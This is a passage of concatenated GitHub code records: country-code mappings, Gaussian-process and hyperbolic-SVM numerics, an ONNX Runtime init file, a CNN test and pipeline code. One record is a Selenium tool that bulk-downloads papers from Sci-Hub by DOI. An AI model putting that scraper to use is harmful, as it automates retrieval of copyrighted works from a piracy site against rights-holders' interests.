len(self.data)\n","repo_name":"MTG/vi_nextcore","sub_path":"dataset/pairs_full_size.py","file_name":"pairs_full_size.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27330309936","text":"china_cities = frozenset(\n [\n \"anqing\",\n \"bengbu\",\n \"hefei\",\n \"huainan\",\n \"huangshan\",\n \"ma’anshan\",\n \"shexian\",\n \"tongcheng\",\n \"tongling\",\n \"wuhu\",\n \"xuancheng\",\n \"beijing\",\n \"chongqing\",\n \"hechuan\",\n \"wanzhou\",\n \"fuzhou\",\n \"longyan\",\n \"nanping\",\n \"quanzhou\",\n \"sanming\",\n \"shaowu\",\n \"xiamen\",\n \"yong’an\",\n \"zhangzhou\",\n \"dunhuang\",\n \"jiuquan\",\n \"lanzhou\",\n \"pingliang\",\n \"tianshui\",\n \"wuwei\",\n \"yumen\",\n \"chaozhou\",\n \"foshan\",\n \"guangzhou\",\n \"jiangmen\",\n \"maoming\",\n \"meizhou\",\n \"shantou\",\n \"shaoguan\",\n \"shenzhen\",\n \"zhanjiang\",\n \"zhaoqing\",\n \"zhongshan\",\n \"baise\",\n \"beihai\",\n \"guilin\",\n \"liuzhou\",\n \"nanning\",\n \"pingxiang\",\n \"wuzhou\",\n \"yulin\",\n \"anshun\",\n \"duyun\",\n \"guiyang\",\n \"zunyi\",\n \"haikou\",\n \"baoding\",\n \"cangzhou\",\n \"chengde\",\n \"handan\",\n \"kalgan\",\n \"qinhuangdao\",\n \"shanhaiguan\",\n \"shijiazhuang\",\n \"tangshan\",\n \"xingtai\",\n \"xuanhua\",\n \"zhengding\",\n \"acheng\",\n \"binxian\",\n \"harbin\",\n \"hegang\",\n \"hulan\",\n \"jiamusi\",\n \"jixi\",\n \"mudanjiang\",\n \"qiqihar\",\n \"shuangyashan\",\n \"yichun\",\n \"anyang\",\n \"hebi\",\n \"jiaozuo\",\n \"kaifeng\",\n \"luohe\",\n \"luoyang\",\n \"nanyang\",\n \"shangqiu\",\n \"xinxiang\",\n \"xinyang\",\n \"xuchang\",\n \"zhengzhou\",\n \"zhoukou\",\n \"hongkong\",\n \"victoria\",\n \"daye\",\n \"hankou\",\n \"hanyang\",\n \"huangshi\",\n \"jingzhou\",\n \"laohekou\",\n \"wuchang\",\n \"wuhan\",\n \"xiangfan\",\n \"yichang\",\n \"changde\",\n \"changsha\",\n \"hengyang\",\n \"jinshi\",\n \"shaoyang\",\n \"xiangtan\",\n \"yiyang\",\n \"yueyang\",\n \"zhuzhou\",\n \"baotou\",\n \"chifeng\",\n \"duolun\",\n \"erenhot\",\n \"hailar\",\n \"hohhot\",\n \"jining\",\n \"manzhouli\",\n \"tongliao\",\n \"changshu\",\n \"changzhou\",\n \"huai’an\",\n \"huaiyin\",\n \"lianyungang\",\n \"nanjing\",\n \"nantong\",\n \"suzhou\",\n \"taizhou\",\n \"wuxi\",\n \"xuzhou\",\n \"yancheng\",\n \"yangzhou\",\n \"zhenjiang\",\n \"ganzhou\",\n \"ji’an\",\n \"jingdezhen\",\n \"jiujiang\",\n \"nanchang\",\n \"pingxiang\",\n \"shangrao\",\n \"zhangshu\",\n \"baicheng\",\n \"changchun\",\n \"jilin\",\n \"liaoyuan\",\n \"siping\",\n \"tonghua\",\n \"yanji\",\n \"anshan\",\n \"beipiao\",\n \"benxi\",\n \"dalian\",\n \"dandong\",\n \"fushun\",\n \"fuxin\",\n \"liaoyang\",\n \"lüshun\",\n \"shenyang\",\n \"wafangdian\",\n \"yingkou\",\n \"macau\",\n \"yinchuan\",\n \"golmud\",\n \"lenghu\",\n \"xining\",\n \"ankang\",\n \"baoji\",\n \"hanzhong\",\n \"shangluo\",\n \"tongguan\",\n \"xi’an\",\n \"xianyang\",\n \"yan’an\",\n \"dezhou\",\n \"jinan\",\n \"jining\",\n \"linzi\",\n \"qingdao\",\n \"qufu\",\n \"weifang\",\n \"weihai\",\n \"yantai\",\n \"zaozhuang\",\n \"zibo\",\n \"shanghai\",\n \"changzhi\",\n \"datong\",\n \"jinzhong\",\n \"linfen\",\n \"puzhou\",\n \"taiyuan\",\n \"yangquan\",\n \"chengdu\",\n \"kangding\",\n \"luzhou\",\n \"mianyang\",\n \"nanchong\",\n \"neijiang\",\n \"wutongqiao\",\n \"ya’an\",\n \"yibin\",\n \"zigong\",\n \"tanggu\",\n \"tianjin\",\n \"gartok\",\n \"gyangzê\",\n \"lhasa\",\n \"xigazê\",\n \"hami\",\n \"hotan\",\n \"karamay\",\n \"kashgar\",\n \"kucha\",\n \"kuldja\",\n \"shihezi\",\n \"turfan\",\n \"ürümqi\",\n \"yarkand\",\n \"dali\",\n \"gejiu\",\n \"jinghong\",\n \"kaiyuan\",\n \"kunming\",\n \"pu’er\",\n \"fenghua\",\n \"hangzhou\",\n \"huzhou\",\n \"jiaxing\",\n \"jinhua\",\n \"ningbo\",\n \"quzhou\",\n \"shaoxing\",\n \"wenzhou\",\n ]\n)\n\nnorth_a_map = {\n \"belize\": \"BLZ\",\n \"canada\": \"CAN\",\n \"costa_rica\": \"CRI\",\n \"cuba\": \"CUB\",\n \"dominican_republic\": \"DOM\",\n \"guatemala\": \"GTM\",\n \"jamaica\": \"JAM\",\n \"mexico\": \"MEX\",\n \"panama\": \"PAN\",\n \"usa\": \"USA\",\n \"puerto_rico\": \"USA\",\n}\n\nafrica_map = {\n \"algeria\": \"DZA\",\n \"benin\": \"BEN\",\n \"botswana\": \"BWA\",\n \"cameroon\": \"CMR\",\n \"drc\": \"COD\",\n \"democratic_republic_of_the_congo\": \"COD\",\n \"egypt\": \"EGY\",\n \"gabon\": \"GAB\",\n \"gambia\": \"GMB\",\n \"ghana\": \"GHA\",\n \"kenya\": \"KEN\",\n \"madagascar\": \"MDG\",\n \"mali\": \"MLI\",\n \"morocco\": \"MAR\",\n \"nigeria\": \"NGA\",\n \"reunion\": \"REU\",\n \"senegal\": \"SEN\",\n \"sierra_leone\": \"SLE\",\n \"south_africa\": \"ZAF\",\n \"tunisia\": \"TUN\",\n \"uganda\": \"UGA\",\n \"zambia\": \"ZMB\",\n}\n\nsouth_a_map = {\n \"argentina\": \"ARG\",\n \"aruba\": \"ABW\",\n \"brazil\": \"BRA\",\n \"chile\": \"CHL\",\n \"colombia\": \"COL\",\n \"curacao\": \"NLD\",\n \"ecuador\": \"ECU\",\n \"peru\": \"PER\",\n \"suriname\": \"SUR\",\n \"uruguay\": \"URY\",\n \"venezuela\": \"VEN\",\n}\n\neurope_map = {\n \"andorra\": \"AND\",\n \"austria\": \"AUT\",\n \"belarus\": \"BLR\",\n \"belgium\": \"BEL\",\n \"bosnia_and_herzegovina\": \"BIH\",\n \"bulgaria\": \"BGR\",\n \"crimea\": \"RUS\",\n \"croatia\": \"HRV\",\n \"cyprus\": \"CYP\",\n \"czech_republic\": \"CZE\",\n \"denmark\": \"DNK\",\n \"estonia\": \"EST\",\n \"faroe_islands\": \"FRO\",\n \"finland\": \"FIN\",\n \"france\": \"FRA\",\n \"germany\": \"DEU\",\n \"gibraltar\": \"GIB\",\n \"greece\": \"GRC\",\n \"hungary\": \"HUN\",\n \"iceland\": \"ISL\",\n \"ireland\": \"IRL\",\n \"italy\": \"ITA\",\n \"latvia\": \"LVA\",\n \"lithuania\": \"LTU\",\n \"luxembourg\": \"LUX\",\n \"malta\": \"MLT\",\n \"moldova\": \"MDA\",\n \"montenegro\": \"MNE\",\n \"netherlands\": \"NLD\",\n \"north_macedonia\": \"MKD\",\n \"norway\": \"NOR\",\n \"poland\": \"POL\",\n \"portugal\": \"PRT\",\n \"romania\": \"ROU\",\n \"russia\": \"RUS\",\n \"serbia\": \"SRB\",\n \"slovakia\": \"SVK\",\n \"slovenia\": \"SVN\",\n \"spain\": \"ESP\",\n \"sweden\": \"SWE\",\n \"switzerland\": \"CHE\",\n \"turkey\": \"TUR\",\n \"ukraine\": \"UKR\",\n \"united_kingdom\": \"GBR\",\n \"uk\": \"GBR\",\n \"scotland\": \"GBR\",\n \"northern_ireland\": \"GBR\",\n \"wales\": \"GBR\",\n \"england\": \"GBR\",\n}\n\nasia_map = {\n \"bahrain\": \"BHR\",\n \"bahrein\": \"BHR\",\n \"bangladesh\": \"BGD\",\n \"brunei\": \"BRN\",\n \"cambodia\": \"KHM\",\n \"china\": \"CHN\",\n \"georgia\": \"GEO\",\n \"hong_kong\": \"HKG\",\n \"india\": \"IND\",\n \"indonesia\": \"IDN\",\n \"iran\": \"IRN\",\n \"iraq\": \"IRQ\",\n \"israel\": \"ISR\",\n \"japan\": \"JPN\",\n \"jordan\": \"JOR\",\n \"kazakhstan\": \"KAZ\",\n \"kuwait\": \"KWT\",\n \"lebanon\": \"LBN\",\n \"malaysia\": \"MYS\",\n \"mongolia\": \"MNG\",\n \"myanmar\": \"MMR\",\n \"nepal\": \"NPL\",\n \"oman\": \"OMN\",\n \"pakistan\": \"PAK\",\n \"philippines\": \"PHL\",\n \"qatar\": \"QAT\",\n \"saudi_arabia\": \"SAU\",\n \"saudiarabia\": \"SAU\",\n \"singapore\": \"SGP\",\n \"south_korea\": \"KOR\",\n \"sri_lanka\": \"LKA\",\n \"taiwan\": \"TWN\",\n \"thailand\": \"THA\",\n \"timor-leste\": \"TLS\",\n \"united_arab_emirates\": \"ARE\",\n \"uzbekistan\": \"UZB\",\n \"vietnam\": \"VNM\",\n}\n\noceania_map = {\n \"new_zealand\": \"NZL\",\n \"australia\": \"AUS\",\n \"guam\": \"GUM\",\n}\n\n\nclass CountryAlphaMap:\n \"\"\"\n Maps a country name to its corresponding Alpha 3 code\n \"\"\"\n\n @staticmethod\n def getCode(country_name: str) -> str:\n \"\"\"\n Args;\n\n - country_name (str): country_name should be all lower case and have \"_\" in place of \" \".\n\n Returns:\n\n - str: country name with proper capitalization\n - str: country's corresponding alpha 3 code\n \"\"\"\n maps = [africa_map, europe_map, south_a_map, north_a_map, asia_map, oceania_map]\n country = \"China\"\n iso_a3 = \"CHN\"\n for continent in maps:\n actl_iso = continent.get(country_name, \"\")\n\n if actl_iso:\n country = \" \".join(\n map(lambda x: x.capitalize(), country_name.split(\"_\"))\n )\n country = \"Saudi Arabia\" if country == \"Saudiarabia\" else country\n\n iso_a3 = actl_iso\n break\n\n return (country, iso_a3)\n","repo_name":"ElasticBottle/primer_checker","sub_path":"cgi_scripts/country_to_alpha.py","file_name":"country_to_alpha.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"4087666282","text":"from typing import List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nimport pymc3 as pm\nfrom scipy import linalg\n\n\"\"\"\nCode mainly contributed by Adrian Seyboldt (@aseyboldt) and Luciano Paz (@lucianopaz).\n\"\"\"\n\n\ndef make_sum_zero_hh(N: int) -> np.ndarray:\n \"\"\"\n Build a householder transformation matrix that maps e_1 to a vector of all 1s.\n \"\"\"\n e_1 = np.zeros(N)\n e_1[0] = 1\n a = np.ones(N)\n a /= np.sqrt(a @ a)\n v = e_1 - a\n v /= np.sqrt(v @ v)\n return np.eye(N) - 2 * np.outer(v, v)\n\n\ndef make_centered_gp_eigendecomp(\n time: np.ndarray,\n lengthscale: Union[float, str, List[Union[float, str]]] = 1,\n variance_limit: float = 0.95,\n variance_weight: Optional[List[float]] = None,\n kernel: str = \"gaussian\",\n zerosum: bool = False,\n period: Optional[Union[float, str]] = None,\n):\n \"\"\"\n Decompose the GP into eigen values and eigen vectors.\n Parameters\n ----------\n time : np.ndarray\n Array containing the time points of observations.\n lengthscale : float or str or list\n Length scale parameter of the GP. Set in the ``config`` dictionary.\n A list of lengthscales can be provided when using the Gaussian kernel.\n The corresponding covariance matrices will then be added to each other.\n variance_limit : float\n Controls how many of the eigen vectors of the GP are used. So, if\n ``variance_limit=1``, all eigen vectors are used.\n variance_weight: Optional[List[float]]\n The weight attributed to each covariance function when there are several\n lengthscale. By default all lengthscales have the same weight.\n kernel : str\n Select the kernel function from the two available: gaussian or periodic.\n zerosum : bool\n Constrain all basis functions to sum(basis) = 0. The resulting GP will\n thus sum to 0 along the time axis.\n period : float or str\n Only used if the kernel is periodic. Determines the period of the kernel.\n \"\"\"\n\n ## Construct covariance matrix\n X = time[:, None]\n\n if kernel == \"gaussian\":\n if isinstance(lengthscale, (int, float, str)):\n lengthscale = [lengthscale]\n\n if variance_weight:\n assert len(variance_weight) == len(\n lengthscale\n ), \"`variance_weight` must have the same length as `lengthscale`.\"\n variance_weight = np.asarray(variance_weight)\n assert np.isclose(\n variance_weight.sum(), 1.0\n ), \"`variance_weight` must sum to 1.\"\n else:\n variance_weight = np.ones_like(lengthscale)\n\n dists = []\n for ls in lengthscale:\n if isinstance(ls, str):\n ls = pd.to_timedelta(ls).to_timedelta64()\n dists.append(((X - X.T) / np.array(ls)) ** 2)\n\n cov = sum(\n w * np.exp(-dist / 2) for (w, dist) in zip(variance_weight, dists)\n ) / len(lengthscale)\n # https://gist.github.com/bwengals/481e1f2bc61b0576280cf0f77b8303c6\n\n elif kernel == \"periodic\":\n if len(lengthscale) > 1:\n raise NotImplementedError(\n \"Multiple lengthscales can only be used with the Gaussian kernel.\"\n )\n elif variance_weight:\n raise NotImplementedError(\n \"`variance_weight` can only be used with the Gaussian kernel.\"\n )\n elif isinstance(period, str):\n period = pd.to_timedelta(period).to_timedelta64()\n\n dists = np.pi * ((time[:, None] - time[None, :]) / period)\n cov = np.exp(-2 * (np.sin(dists) / lengthscale) ** 2)\n\n # https://gpflow.readthedocs.io/en/master/notebooks/tailor/kernel_design.html\n elif kernel == \"randomwalk\":\n if np.testing.assert_allclose(lengthscale, 1):\n raise NotImplementedError(\n f\"No lengthscale needed with the Random Walk kernel.\"\n )\n elif variance_weight:\n raise NotImplementedError(\n f\"`variance_weight` can only be used with the Gaussian kernel.\"\n )\n cov = np.minimum(X, X.T)\n\n else:\n raise ValueError(\n f\"Unknown kernel = {kernel}. Accepted values are 'gaussian' and 'periodic'\"\n )\n\n if zerosum:\n Q = make_sum_zero_hh(len(cov))\n D = np.eye(len(cov))\n D[0, 0] = 0\n\n # 1) Transform the covariance matrix so that the first entry\n # is the mean: A = Q @ cov @ Q.T\n # 2) Project onto the subspace without the mean: B = D @ A @ D\n # 3) Transform the result back to the original space: Q.T @ B @ Q\n cov = Q.T @ D @ Q @ cov @ Q.T @ D @ Q\n\n vals, vecs = linalg.eigh(cov)\n precision_limit_inds = np.logical_or(vals < 0, np.imag(vals) != 0)\n\n if np.any(precision_limit_inds):\n cutoff = np.where(precision_limit_inds[::-1])[0][0]\n vals = vals[len(vals) - cutoff :]\n vecs = vecs[:, vecs.shape[1] - cutoff :]\n\n if variance_limit == 1:\n n_eigs = len(vals)\n\n else:\n n_eigs = ((vals[::-1].cumsum() / vals.sum()) > variance_limit).nonzero()[0][0]\n\n return vecs[:, -n_eigs:] * np.sqrt(vals[-n_eigs:])\n\n\ndef make_gp_basis(time, gp_config, key=None, *, model=None):\n model = pm.modelcontext(model)\n\n if gp_config is None:\n gp_config = {\n \"lengthscale\": 8,\n \"kernel\": \"gaussian\",\n \"zerosum\": False,\n \"variance_limit\": 0.99,\n }\n else:\n gp_config = gp_config.copy()\n\n if (\n np.issubdtype(time.dtype, np.datetime64)\n or (str(time.dtype).startswith(\"datetime64\"))\n ) and (\n gp_config[\"kernel\"] == \"gaussian\"\n and \"lengthscale\" in gp_config\n and not isinstance(gp_config[\"lengthscale\"], str)\n ):\n gp_config[\"lengthscale\"] = f\"{gp_config['lengthscale'] * 7}D\"\n\n gp_basis_funcs = make_centered_gp_eigendecomp(time, **gp_config)\n n_basis = gp_basis_funcs.shape[1]\n dim = f\"gp_{key}_basis\"\n model.add_coords({dim: pd.RangeIndex(n_basis)})\n\n return gp_basis_funcs, dim\n","repo_name":"pollsposition/models","sub_path":"presidential-elections/utils/gpapproximation.py","file_name":"gpapproximation.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"54"} +{"seq_id":"7337753802","text":"import os\nfrom packaging import version\n\n################################################################################\n# All global constant goes here, before ORTModule is imported ##################\n################################################################################\nONNX_OPSET_VERSION = 12\nMINIMUM_TORCH_VERSION_STR = '1.8.1'\nTORCH_CPP_BUILD_DIR = os.path.join(os.path.dirname(__file__),'torch_inline_extensions')\n\n# Check whether Torch C++ extension compilation was aborted in previous runs\nif not os.path.exists(TORCH_CPP_BUILD_DIR):\n os.makedirs(TORCH_CPP_BUILD_DIR, exist_ok = True)\nelif os.path.exists(os.path.join(TORCH_CPP_BUILD_DIR,'lock')):\n print(\"WARNING: ORTModule detected PyTorch CPP extension's lock file during initialization, \"\n \"which can cause unexpected hangs. \"\n f\"Delete {os.path.join(TORCH_CPP_BUILD_DIR,'lock')} to prevent unexpected behavior.\")\n\n# Verify proper PyTorch is installed before proceding to ONNX Runtime initializetion\ntry:\n import torch\n torch_version = version.parse(torch.__version__.split('+')[0])\n minimum_torch_version = version.parse(MINIMUM_TORCH_VERSION_STR)\n if torch_version < minimum_torch_version:\n raise RuntimeError(\n f'ONNXRuntime ORTModule frontend requires PyTorch version greater or equal to {MINIMUM_TORCH_VERSION_STR}, '\n f'but version {torch.__version__} was found instead.')\nexcept:\n raise(f'PyTorch {MINIMUM_TORCH_VERSION_STR} must be installed in order to run ONNXRuntime ORTModule frontend!')\n\n# ORTModule must be loaded only after all validation passes\nfrom .ortmodule import ORTModule\n","repo_name":"sirius93123/onnxruntime","sub_path":"orttraining/orttraining/python/training/ortmodule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"41721928356","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport sys\n# from scihub import SciHub\nimport os\n\nimport PyQt5.QtCore\nimport pandas as pd\nimport time\nimport glob\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport urllib.request\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import QFileInfo\nfrom bs4 import BeautifulSoup\n\nform_class = uic.loadUiType(\"./sci_hub.ui\")[0]\n\nURL_scihub = 'https://sci-hub.se/'\nCount = 0\n\n\n\nclass Sci_Hub(QDialog, form_class):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.PDF_Down)\n self.pushButton_2.clicked.connect(self.fileopen)\n self.pushButton_3.clicked.connect(self.folderopen)\n\n\n def PDF_Down(self):\n\n global URL_target\n global options\n global driver\n global html\n global soup\n global DownScript\n global Count\n\n\n IEEE_export_csv = pd.read_csv(filename[0])\n DOI_CSV = IEEE_export_csv['DOI']\n Title_CSV = IEEE_export_csv['Document Title']\n\n URL_target = URL_scihub + DOI_CSV[Count]\n\n self.textBrowser.append(Title_CSV[Count])\n self.textBrowser.append(URL_target)\n\n options = webdriver.ChromeOptions()\n #options.add_argument('headless')\n options.add_experimental_option(\"prefs\", {\n \"download.default_directory\": str(os.getcwd()) + \"\\Down_pdf\",\n \"download.prompt_for_download\": False,\n \"download.directory_upgrade\": True,\n \"safebrowsing.enabled\": True\n })\n driver = webdriver.Chrome(options=options)\n\n driver.implicitly_wait(10)\n driver.get(URL_target)\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n soup.getText()\n DownScript = str(soup.button).rsplit(sep='\"')[1]\n driver.execute_script(DownScript)\n\n time.sleep(1)\n path_dir = str(os.getcwd()) + \"\\Down_pdf\"+\"\\*.crdownload\"\n glob.glob(path_dir)\n global Wait_flag\n Wait_flag = bool(glob.glob(path_dir))\n\n while Wait_flag :\n Wait_flag = bool(glob.glob(path_dir))\n Count += 1\n return 0\n\n\n # 2. Target url\n # for i, DOI in enumerate(DOI_CSV):\n #\n # URL_target = URL_scihub + DOI\n #\n # self.textBrowser.append(Title_CSV[i])\n # self.textBrowser.append(URL_target)\n #\n # options = webdriver.ChromeOptions()\n # #options.add_argument('headless')\n # options.add_experimental_option(\"prefs\", {\n # \"download.default_directory\": str(os.getcwd()) + \"\\Down_pdf\",\n # \"download.prompt_for_download\": False,\n # \"download.directory_upgrade\": True,\n # \"safebrowsing.enabled\": True\n # })\n # driver = webdriver.Chrome(options=options)\n #\n # driver.implicitly_wait(10)\n # driver.get(URL_target)\n # html = driver.page_source\n # soup = BeautifulSoup(html, 'html.parser')\n # soup.getText()\n # DownScript = str(soup.button).rsplit(sep='\"')[1]\n # driver.execute_script(DownScript)\n #\n # time.sleep(1)\n # path_dir = str(os.getcwd()) + \"\\Down_pdf\"+\"\\*.crdownload\"\n # glob.glob(path_dir)\n # global Wait_flag\n # Wait_flag = bool(glob.glob(path_dir))\n #\n # while Wait_flag :\n # Wait_flag = bool(glob.glob(path_dir))\n # return 0\n # return 0\n\n\n def fileopen(self):\n global filename\n filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File')\n\n print(filename[0])\n\n\n\n IEEE_export_csv = pd.read_csv(filename[0])\n DOI_CSV = IEEE_export_csv['DOI']\n Title_CSV = IEEE_export_csv['Document Title']\n\n self.textBrowser_2.append(filename[0])\n self.textBrowser.append(filename[0])\n\n\n def folderopen(self):\n global forderpath\n forderpath = QtWidgets.QFileDialog.getExistingDirectory()\n self.textBrowser_3.append(forderpath)\n\n\n\n # Press the green button in the gutter to run the script.\n\n\nif __name__ == '__main__':\n\n # 0. UI loading\n app = QApplication(sys.argv)\n sci_ui = Sci_Hub()\n sci_ui.show()\n app.exec_()\n\n\n","repo_name":"Seobuk/SCI_HUB_DOWN_PDF","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1882735086","text":"import logging\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# Third-party imports\nimport numpy as np\nimport scipy as sp\nimport torch\nfrom numba import jit\n\n\n# =================\n# HYPERBOLOID MODEL\n# =================\n\n\n@jit(parallel=True)\ndef mink_prod(x, y):\n \"\"\"\n (x,y) -> x1*y1 - sum(x2y2, ..., xnyn)\n \n Assume x, y come in batch mode\n\n \"\"\"\n if len(x.shape) < 2:\n x = x.reshape(1, -1)\n if len(y.shape) < 2:\n y = y.reshape(1, -1)\n # head = torch.mul(x[:,0], y[:,0])\n # logger.info(head)\n\n # rest = torch.sum(torch.mul(x, y), 1)\n\n # return head - rest\n\n mink_x = x.copy()\n mink_x[:, 1:] = -mink_x[:, 1:]\n xy = np.float64(mink_x) * np.float64(y)\n\n return np.sum(xy, 1).reshape(-1, 1)\n\n\ndef ball2loid(b):\n \"\"\"\n Convert from poincare ball coordinates to hyperboloid\n\n \"\"\"\n x0 = 2. / (1 - np.sum(b**2, 1)) - 1\n x0 = x0.reshape(-1, 1)\n bx0 = b * (x0+1)\n\n res = np.empty((bx0.shape[0], bx0.shape[1]+1), dtype=np.float64)\n res[:, 0] = x0.ravel()\n res[:, 1:] = bx0\n\n return res\n\n\ndef loid_dist(x, y, from_ball=True):\n \"\"\"\n Hyperbolic distance between x and y. We compute it in the hyperboloid\n model, thus convert to loid from ball, if coordinates are in ball\n\n \"\"\"\n if from_ball:\n # should be in batch x dims \n x = ball2loid(x.reshape(1, -1))\n y = ball2loid(y.reshape(1, -1))\n\n return np.arccosh(mink_prod(x, y).ravel().item())\n\n\ndef loid2ball(l):\n \"\"\"\n Convert hyperboloid coordinates to poincare ball\n\n \"\"\"\n head = l[:,1:]\n rest = 1 + l[:, 0]\n rest = rest.reshape(-1, 1)\n\n return np.divide(head, rest)\n\n\ndef obj_fn(w, x, y, C):\n if len(y.shape) < 2:\n y = y.reshape(-1, 1)\n\n margin_term = -mink_prod(w, w)/2.0\n misclass_term = np.arcsinh(1) - np.arcsinh(y * mink_prod(x, w))\n obj = margin_term + C * np.sum(misclass_term)\n\n return obj.ravel()\n\n\n@jit(parallel=True)\ndef grad_fn(w, x, y, C):\n if len(y.shape) < 2:\n y = y.reshape(-1, 1)\n\n w_grad_margin = w.copy()\n w_grad_margin[0] = -1. * w_grad_margin[0]\n z = np.float64(y * mink_prod(np.float64(x), np.float64(w)))\n missed = (np.arcsinh(1) -np.arcsinh(z)) > 0\n x_grad_misclass = x\n x_grad_misclass[:, 1:] = -1. * x_grad_misclass[:, 1:]\n\n sqrt_term = np.float64(1.0 + z**2)\n w_grad_misclass = missed * -(1. / np.sqrt(sqrt_term)) * y * x_grad_misclass\n\n w_grad = w_grad_margin + C * np.sum(w_grad_misclass, 0)\n\n return w_grad\n\n\ndef is_feasible(w):\n \"\"\"\n Mink prod of weights should be less than 0\n\n \"\"\"\n return (mink_prod(w, w) < 1).ravel().item()\n\n\ndef project_weight(w, alpha, ep=1e-5):\n \"\"\"\n This function can be minimized to find the smallest alpha, which projects\n weights to the closest point so that w * w = -1 (minkowski)\n\n \"\"\"\n new_w = w.copy()\n new_w[1:] = (1 + alpha) * new_w[1:]\n new_w[0] = np.sqrt(np.sum((new_w[1:] - ep)**2))\n\n return new_w\n\n\n# =============\n# POINCARE BALL\n# =============\n\ndef mobius_addition(x, y, c=1.0):\n \"\"\"\n Mobius addition in the poincare ball model\n\n \"\"\"\n xx = np.sum(x*x)\n yy = np.sum(y*y)\n xy = np.sum(x*y)\n\n numerator = (1 + 2*c*xy + c*yy)*x + (1 - c*xx)*y\n denominator = 1 + 2*c*xy + c*c*xx*yy\n\n return numerator/denominator\n\n\ndef project_to_unitball(x, eps=1e-5):\n \"\"\"\n If norm of x > 1, then you need to bring it back to the poincare ball. If\n `optimize=False` then project recursively\n\n \"\"\"\n if np.sum(x*x) < 1:\n return x\n\n x_norm = np.sqrt(np.sum(x*x))\n x = x/x_norm - eps\n\n return x\n\n\ndef ball_dist(x, y):\n xx = np.sum(x*x)\n yy = np.sum(y*y)\n x_minus_y = x - y\n x_minus_y2 = np.sum(x_minus_y*x_minus_y)\n\n arg = 2*(x_minus_y2)/((1 - xx)*(1 - yy))\n\n return np.arccosh(1 + arg)\n\n\ndef poincare_metric(x):\n \"\"\"\n Poincare metric of x, i.e., inner product of x. x shape should be 1 x d\n\n \"\"\"\n x_new = x.copy().reshape(1, -1)\n euc_inner = np.sum(x_new**2)\n conformal_factor = 2 / (1 - euc_inner)\n\n return conformal_factor**2 * euc_inner\n","repo_name":"plumdeq/hsvm","sub_path":"htools.py","file_name":"htools.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"3436261198","text":"from torch.utils.data import DataLoader\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn.init\nfrom model.cnn import CNN\nfrom model.cnn_v2 import CNN_V2\nimport visdom\n\nvis = visdom.Visdom()\n\n# vis.text('Hello, World!', env=\"main\")\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n# device = 'cpu'\n\ntorch.manual_seed(777)\nif device == 'cuda':\n torch.cuda.manual_seed_all(777)\n\n# model = CNN().to(device)\n# model.load_state_dict(torch.load('./model.pth'))\nmodel_v2 = CNN_V2().to(device)\nmodel_v2.load_state_dict(torch.load('./model_v2.pth'))\n# # print(model.layer1[0])\n# # print(new_model.layer1[0])\n# #\n# # print(model.layer1[0].weight[0][0][0])\n# # print(new_model.layer1[0].weight[0][0][0])\n\ntrans = torchvision.transforms.Compose([\n transforms.ToTensor(),\n])\ntest_data = torchvision.datasets.ImageFolder(root='../data/custom_data/test_data', transform=trans)\ntest_set = DataLoader(dataset=test_data, batch_size=len(test_data))\n# test_set = DataLoader(dataset=test_data)\ncheck_list = []\n\n# test\nwith torch.no_grad():\n for num, data in enumerate(test_set):\n imgs, label = data\n\n imgs = imgs.to(device)\n label = label.to(device)\n\n prediction = model_v2(imgs)\n\n correct_prediction = torch.argmax(prediction, 1) == label\n check_list = correct_prediction.data.cpu().numpy()\n accuracy = correct_prediction.float().mean()\n print(f'Accuracy:{accuracy.item()}')\n\n# check image on visdom\nzero_list = []\nfor num, value in enumerate(check_list):\n if not value:\n zero_list.append(num)\n\nprint(zero_list)\nfor num, data in enumerate(test_set):\n imgs, label = data\n for idx, img in enumerate(imgs):\n if idx in zero_list:\n print(idx)\n vis.images(img, env='main')\n","repo_name":"whayoung27/AI-Burning-Day_Result","sub_path":"[web][No_Chickens][영일이]/ETC/AI/model/cnn_test.py","file_name":"cnn_test.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"4704090413","text":"'''PipelineIDR.py - Tasks for IDR analysis\n=============================================\n\nReference\n---------\n'''\n\nimport os\nimport re\nimport pysam\nimport random\n\nimport CGATPipelines.Pipeline as P\nimport CGAT.IOTools as IOTools\nimport CGATPipelines.PipelineTracks as PipelineTracks\nfrom CGAT import WrapperIDR\n\n\ndef splitBam(infile, outfile_stub, params):\n pysam_in = pysam.Samfile(infile, \"rb\")\n n_outfiles = int(params[0])\n\n outfile_handles = []\n outfile_names = []\n\n # create list of upper bounds for intervals\n intervals = []\n lower = 0\n for i in range(n_outfiles):\n upper = lower + 1.0 / n_outfiles\n intervals.append(upper)\n # add an outfile handle to list of outfile handles\n outf = outfile_stub + \"_\" + str(i).zfill(2) + \".bam\"\n outfile_handles.append(pysam.Samfile(outf, \"wb\", 